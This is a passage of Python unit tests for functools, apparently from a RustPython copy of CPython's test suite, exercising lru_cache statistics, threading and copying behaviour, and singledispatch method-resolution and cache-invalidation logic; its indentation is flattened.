hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(maxsize, 20)
self.assertEqual(currsize, 0)
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
domain = range(5)
for i in range(1000):
x, y = choice(domain), choice(domain)
actual = f(x, y)
expected = orig(x, y)
self.assertEqual(actual, expected)
hits, misses, maxsize, currsize = f.cache_info()
self.assertTrue(hits > misses)
self.assertEqual(hits + misses, 1000)
self.assertEqual(currsize, 20)
f.cache_clear() # test clearing
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 0)
self.assertEqual(currsize, 0)
f(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# Test bypassing the cache
self.assertIs(f.__wrapped__, orig)
f.__wrapped__(x, y)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size zero (which means "never-cache")
@self.module.lru_cache(0)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 0)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 5)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 0)
self.assertEqual(misses, 5)
self.assertEqual(currsize, 0)
# test size one
@self.module.lru_cache(1)
def f():
nonlocal f_cnt
f_cnt += 1
return 20
self.assertEqual(f.cache_info().maxsize, 1)
f_cnt = 0
for i in range(5):
self.assertEqual(f(), 20)
self.assertEqual(f_cnt, 1)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 4)
self.assertEqual(misses, 1)
self.assertEqual(currsize, 1)
# test size two
@self.module.lru_cache(2)
def f(x):
nonlocal f_cnt
f_cnt += 1
return x*10
self.assertEqual(f.cache_info().maxsize, 2)
f_cnt = 0
for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
# the starred calls (first 7, first 9, first 8, and the final 7) are the four cache misses
self.assertEqual(f(x), x*10)
self.assertEqual(f_cnt, 4)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(hits, 12)
self.assertEqual(misses, 4)
self.assertEqual(currsize, 2)
def test_lru_no_args(self):
@self.module.lru_cache
def square(x):
return x ** 2
self.assertEqual(list(map(square, [10, 20, 10])),
[100, 400, 100])
self.assertEqual(square.cache_info().hits, 1)
self.assertEqual(square.cache_info().misses, 2)
self.assertEqual(square.cache_info().maxsize, 128)
self.assertEqual(square.cache_info().currsize, 2)
def test_lru_bug_35780(self):
# C version of the lru_cache was not checking to see if
# the user function call has already modified the cache
# (this arises in recursive calls and in multi-threading).
# This caused the cache to have orphan links not referenced
# by the cache dictionary.
once = True # Modified by f(x) below
@self.module.lru_cache(maxsize=10)
def f(x):
nonlocal once
rv = f'.{x}.'
if x == 20 and once:
once = False
rv = f(x)
return rv
# Fill the cache
for x in range(15):
self.assertEqual(f(x), f'.{x}.')
self.assertEqual(f.cache_info().currsize, 10)
# Make a recursive call and make sure the cache remains full
self.assertEqual(f(20), '.20.')
self.assertEqual(f.cache_info().currsize, 10)
def test_lru_bug_36650(self):
# C version of lru_cache was treating a call with an empty **kwargs
# dictionary as being distinct from a call with no keywords at all.
# This did not result in an incorrect answer, but it did trigger
# an unexpected cache miss.
@self.module.lru_cache()
def f(x):
pass
f(0)
f(0, **{})
self.assertEqual(f.cache_info().hits, 1)
def test_lru_hash_only_once(self):
# To protect against weird reentrancy bugs and to improve
# efficiency when faced with slow __hash__ methods, the
# LRU cache guarantees that it will call __hash__
# only once per use as an argument to the cached function.
@self.module.lru_cache(maxsize=1)
def f(x, y):
return x * 3 + y
# Simulate the integer 5
mock_int = unittest.mock.Mock()
mock_int.__mul__ = unittest.mock.Mock(return_value=15)
mock_int.__hash__ = unittest.mock.Mock(return_value=999)
# Add to cache: One use as an argument gives one call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 1)
self.assertEqual(f.cache_info(), (0, 1, 1, 1))
# Cache hit: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 1, 1, 1))
# Cache eviction: No use as an argument gives no additional call
self.assertEqual(f(6, 2), 20)
self.assertEqual(mock_int.__hash__.call_count, 2)
self.assertEqual(f.cache_info(), (1, 2, 1, 1))
# Cache miss: One use as an argument gives one additional call
self.assertEqual(f(mock_int, 1), 16)
self.assertEqual(mock_int.__hash__.call_count, 3)
self.assertEqual(f.cache_info(), (1, 3, 1, 1))
def test_lru_reentrancy_with_len(self):
# Test to make sure the LRU cache code isn't thrown off by
# caching the built-in len() function. Since len() can be
# cached, we shouldn't use it inside the lru code itself.
old_len = builtins.len
try:
builtins.len = self.module.lru_cache(4)(len)
for i in [0, 0, 1, 2, 3, 3, 4, 5, 6, 1, 7, 2, 1]:
self.assertEqual(len('abcdefghijklmn'[:i]), i)
finally:
builtins.len = old_len
def test_lru_star_arg_handling(self):
# Test regression that arose in ea064ff3c10f
@functools.lru_cache()
def f(*args):
return args
self.assertEqual(f(1, 2), (1, 2))
self.assertEqual(f((1, 2)), ((1, 2),))
def test_lru_type_error(self):
# Regression test for issue #28653.
# lru_cache was leaking when one of the arguments
# wasn't cacheable.
@functools.lru_cache(maxsize=None)
def infinite_cache(o):
pass
@functools.lru_cache(maxsize=10)
def limited_cache(o):
pass
with self.assertRaises(TypeError):
infinite_cache([])
with self.assertRaises(TypeError):
limited_cache([])
def test_lru_with_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n-1) + fib(n-2)
self.assertEqual([fib(n) for n in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_lru_with_maxsize_negative(self):
@self.module.lru_cache(maxsize=-10)
def eq(n):
return n
for i in (0, 1):
self.assertEqual([eq(n) for n in range(150)], list(range(150)))
self.assertEqual(eq.cache_info(),
self.module._CacheInfo(hits=0, misses=300, maxsize=0, currsize=0))
def test_lru_with_exceptions(self):
# Verify that user_function exceptions get passed through without
# creating a hard-to-read chained exception.
# http://bugs.python.org/issue13177
for maxsize in (None, 128):
@self.module.lru_cache(maxsize)
def func(i):
return 'abc'[i]
self.assertEqual(func(0), 'a')
with self.assertRaises(IndexError) as cm:
func(15)
self.assertIsNone(cm.exception.__context__)
# Verify that the previous exception did not result in a cached entry
with self.assertRaises(IndexError):
func(15)
def test_lru_with_types(self):
for maxsize in (None, 128):
@self.module.lru_cache(maxsize=maxsize, typed=True)
def square(x):
return x * x
self.assertEqual(square(3), 9)
self.assertEqual(type(square(3)), type(9))
self.assertEqual(square(3.0), 9.0)
self.assertEqual(type(square(3.0)), type(9.0))
self.assertEqual(square(x=3), 9)
self.assertEqual(type(square(x=3)), type(9))
self.assertEqual(square(x=3.0), 9.0)
self.assertEqual(type(square(x=3.0)), type(9.0))
self.assertEqual(square.cache_info().hits, 4)
self.assertEqual(square.cache_info().misses, 4)
def test_lru_with_keyword_args(self):
@self.module.lru_cache()
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual(
[fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
)
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))
def test_lru_with_keyword_args_maxsize_none(self):
@self.module.lru_cache(maxsize=None)
def fib(n):
if n < 2:
return n
return fib(n=n-1) + fib(n=n-2)
self.assertEqual([fib(n=number) for number in range(16)],
[0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
fib.cache_clear()
self.assertEqual(fib.cache_info(),
self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))
def test_kwargs_order(self):
# PEP 468: Preserving Keyword Argument Order
@self.module.lru_cache(maxsize=10)
def f(**kwargs):
return list(kwargs.items())
self.assertEqual(f(a=1, b=2), [('a', 1), ('b', 2)])
self.assertEqual(f(b=2, a=1), [('b', 2), ('a', 1)])
self.assertEqual(f.cache_info(),
self.module._CacheInfo(hits=0, misses=2, maxsize=10, currsize=2))
def test_lru_cache_decoration(self):
def f(zomg: 'zomg_annotation'):
"""f doc string"""
return 42
g = self.module.lru_cache()(f)
for attr in self.module.WRAPPER_ASSIGNMENTS:
self.assertEqual(getattr(g, attr), getattr(f, attr))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_lru_cache_threaded(self):
n, m = 5, 11
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=n*m)(orig)
hits, misses, maxsize, currsize = f.cache_info()
self.assertEqual(currsize, 0)
start = threading.Event()
def full(k):
start.wait(10)
for _ in range(m):
self.assertEqual(f(k, 0), orig(k, 0))
def clear():
start.wait(10)
for _ in range(2*m):
f.cache_clear()
orig_si = sys.getswitchinterval()
support.setswitchinterval(1e-6)
try:
# create n threads in order to fill cache
threads = [threading.Thread(target=full, args=[k])
for k in range(n)]
with support.start_threads(threads):
start.set()
hits, misses, maxsize, currsize = f.cache_info()
if self.module is py_functools:
# XXX: why can these be unequal?
self.assertLessEqual(misses, n)
self.assertLessEqual(hits, m*n - misses)
else:
self.assertEqual(misses, n)
self.assertEqual(hits, m*n - misses)
self.assertEqual(currsize, n)
# create n threads in order to fill cache and 1 to clear it
threads = [threading.Thread(target=clear)]
threads += [threading.Thread(target=full, args=[k])
for k in range(n)]
start.clear()
with support.start_threads(threads):
start.set()
finally:
sys.setswitchinterval(orig_si)
def test_lru_cache_threaded2(self):
# Simultaneous call with the same arguments
n, m = 5, 7
start = threading.Barrier(n+1)
pause = threading.Barrier(n+1)
stop = threading.Barrier(n+1)
@self.module.lru_cache(maxsize=m*n)
def f(x):
pause.wait(10)
return 3 * x
self.assertEqual(f.cache_info(), (0, 0, m*n, 0))
def test():
for i in range(m):
start.wait(10)
self.assertEqual(f(i), 3 * i)
stop.wait(10)
threads = [threading.Thread(target=test) for k in range(n)]
with support.start_threads(threads):
for i in range(m):
start.wait(10)
stop.reset()
pause.wait(10)
start.reset()
stop.wait(10)
pause.reset()
self.assertEqual(f.cache_info(), (0, (i+1)*n, m*n, i+1))
def test_lru_cache_threaded3(self):
@self.module.lru_cache(maxsize=2)
def f(x):
time.sleep(.01)
return 3 * x
def test(i, x):
with self.subTest(thread=i):
self.assertEqual(f(x), 3 * x, i)
threads = [threading.Thread(target=test, args=(i, v))
for i, v in enumerate([1, 2, 2, 3, 2])]
with support.start_threads(threads):
pass
def test_need_for_rlock(self):
# This will deadlock on an LRU cache that uses a regular lock
@self.module.lru_cache(maxsize=10)
def test_func(x):
'Used to demonstrate a reentrant lru_cache call within a single thread'
return x
class DoubleEq:
'Demonstrate a reentrant lru_cache call within a single thread'
def __init__(self, x):
self.x = x
def __hash__(self):
return self.x
def __eq__(self, other):
if self.x == 2:
test_func(DoubleEq(1))
return self.x == other.x
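# DoubleEq(2).__eq__ re-enters test_func while the cache is mid-lookup,
# so a non-reentrant lock guarding the cache would deadlock here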
test_func(DoubleEq(1)) # Load the cache
test_func(DoubleEq(2)) # Load the cache
self.assertEqual(test_func(DoubleEq(2)), # Trigger a re-entrant __eq__ call
DoubleEq(2)) # Verify the correct return value
def test_lru_method(self):
class X(int):
f_cnt = 0
@self.module.lru_cache(2)
def f(self, x):
self.f_cnt += 1
return x*10+self
a = X(5)
b = X(5)
c = X(7)
self.assertEqual(X.f.cache_info(), (0, 0, 2, 0))
for x in 1, 2, 2, 3, 1, 1, 1, 2, 3, 3:
self.assertEqual(a.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 0, 0))
self.assertEqual(X.f.cache_info(), (4, 6, 2, 2))
for x in 1, 2, 1, 1, 1, 1, 3, 2, 2, 2:
self.assertEqual(b.f(x), x*10 + 5)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 0))
self.assertEqual(X.f.cache_info(), (10, 10, 2, 2))
for x in 2, 1, 1, 1, 1, 2, 1, 3, 2, 1:
self.assertEqual(c.f(x), x*10 + 7)
self.assertEqual((a.f_cnt, b.f_cnt, c.f_cnt), (6, 4, 5))
self.assertEqual(X.f.cache_info(), (15, 15, 2, 2))
self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
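# swap_attr below replaces weakref.WeakKeyDictionary with this TracingDict,
# so singledispatch's dispatch cache records every read and write and the
# test can observe exactly when the cache is consulted and invalidated.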
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
